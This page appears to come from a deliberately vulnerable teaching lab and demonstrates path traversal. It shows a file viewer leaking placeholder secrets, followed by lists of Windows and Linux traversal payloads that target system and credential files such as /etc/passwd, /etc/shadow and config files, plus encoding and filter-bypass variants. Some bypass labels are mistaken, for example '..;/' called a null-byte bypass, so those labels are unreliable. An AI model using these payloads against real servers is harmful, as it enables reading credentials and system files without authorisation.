โ† Back to Dashboard

File Viewer

Available Files:

File Contents:

SECRET DATA
===========
Database Password: supersecret123
API Key: sk-vuln-12345-secret
Admin Token: admin_token_xyz

Resolved Path:

/home/vulnlab.informatikaunimus.id/public_html/includes/files/secret.txt

๐ŸŽฏ Vulnerability Info

Type: Path Traversal / Directory Traversal

Severity: High

๐Ÿ’ก How to Exploit

  • File path is taken directly from user input
  • No validation of ../ sequences
  • Can read files outside intended directory

๐Ÿงช Windows Payloads

../../../Windows/win.ini ..\..\..\..\Windows\System32\drivers\etc\hosts ../../../xampp/apache/conf/httpd.conf ../../config/db.php ....//....//....//Windows/win.ini ..%2f..%2f..%2fWindows/win.ini

๐Ÿงช Linux Payloads

../../../etc/passwd ../../../etc/shadow ../../../var/log/apache2/access.log ../../config/db.php ....//....//....//etc/passwd ..%252f..%252f..%252fetc/passwd

๐Ÿ“ Bypass Techniques

  • ..../ - Double encoding
  • ..%2f - URL encoding
  • ..%252f - Double URL encoding
  • ....// - Filter bypass
  • ..;/ - Null byte bypass